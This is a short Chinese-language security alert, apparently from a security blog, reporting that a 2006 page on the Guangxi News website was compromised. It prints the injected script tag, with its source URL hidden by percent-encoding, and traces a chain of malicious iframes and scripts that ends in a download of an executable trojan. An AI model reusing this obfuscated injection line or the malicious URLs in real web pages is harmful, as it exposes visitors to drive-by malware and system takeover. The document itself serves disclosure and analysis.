注册
登录
| 关键词: http sdasew frame cn htm 11 08 恶意 病毒 script |
广西新闻网(http://www.gxnews.com.cn/)被植入恶意代码。 用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。 MalUrl:http://www.gxnews.com.cn/staticpages/20061021/newgx4539df75-847704.shtml 网页被嵌入恶意链接代码: <script language=”javascript” type=”text/javascript” src=”http://%77%77%77%2E%63%72%63%66%2E%6F%72%67%2E%63%6E/%6C%6F%67%6F%2E%67%69%66″></script> 挂马分析: [wide]http://www.gxnews.com.cn/staticpages/20061021/newgx4539df75-847704.shtml [script]http://%77%77%77%2e%63%72%63%66%2e%6f%72%67%2e%63%6e/%6c%6f%67%6f%2e%67%69%66 [frame]http://11sdasew.cn/08/0008.htm?22 [frame]http://11sdasew.cn/08/index.html [frame]http://11sdasew.cn/08/ytqm.htm [script]http://11sdasew.cn/08/js.js [frame]http://11sdasew.cn/08/yt14.htm [frame]http://11sdasew.cn/08/ytfl.htm [frame]http://11sdasew.cn/08/ytff.htm [frame]http://11sdasew.cn/08/ytvod.htm [frame]http://11sdasew.cn/08/ytxxz.htm [frame]http://11sdasew.cn/08/ytlb.htm [frame]http://11sdasew.cn/08/yt122121.htm [script]http://js.tongji.cn.yahoo.com/1116244/ystat.js 最终下载病毒文件: http://qjdiejs.cn/8.exe 通过执行以上病毒文件,来达到完全控制访问者的系统。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
